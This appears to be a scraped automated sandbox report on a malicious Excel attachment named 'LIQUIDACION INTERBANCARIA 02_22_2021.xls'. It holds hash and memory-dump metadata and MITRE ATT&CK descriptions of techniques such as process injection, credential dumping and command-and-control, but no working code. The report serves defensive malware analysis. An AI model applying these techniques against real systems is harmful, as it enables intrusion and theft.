Instruction ID: 7ee4aa9397348a33f2bf6feb289a3f98f64b47dec273f0e81bb8a256c5fe2af0
Opcode Fuzzy Hash: 49e2b3c42efdf4b064c867c76414484de4774fbbb219f517053cb0382779dda3
Instruction Fuzzy Hash: CDC08C78A000248BE380DB04C980B9676F2BB54300F0082D4C00C8B384C6308C80CB41

Uniqueness

Uniqueness Score: -1.00%

Function 01561680, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.869655153.0000000001560000.00000040.00000001.sdmp, Offset: 01560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 902cdbff3ca0d51ef8950c8cc2c90b5ae0af5937de69edea555979f89c78ce89
Instruction ID: bc5ad54ef2ab7ab48d1a8639247849e9865c17da4b8a240d237341fff124edbe
Opcode Fuzzy Hash: 902cdbff3ca0d51ef8950c8cc2c90b5ae0af5937de69edea555979f89c78ce89
Instruction Fuzzy Hash: 86B012EB82D28062D3831220481038E5A01FB90200FDF0A5194D0C12C5F9D6C0004181

Uniqueness

Uniqueness Score: -1.00%

Function 01567200, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.869655153.0000000001560000.00000040.00000001.sdmp, Offset: 01560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Uniqueness

Uniqueness Score: -1.00%

Function 01561480, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.869655153.0000000001560000.00000040.00000001.sdmp, Offset: 01560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report LIQUIDACION INTERBANCARIA 02_22_2021.xls

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "LIQUIDACION INTERBANCARIA 02_22_2021.xls"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: Feuil1.cls, Stream Size: 977

General

VBA Code Keywords

VBA Code

VBA File Name: ThisWorkbook.cls, Stream Size: 1142

General

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre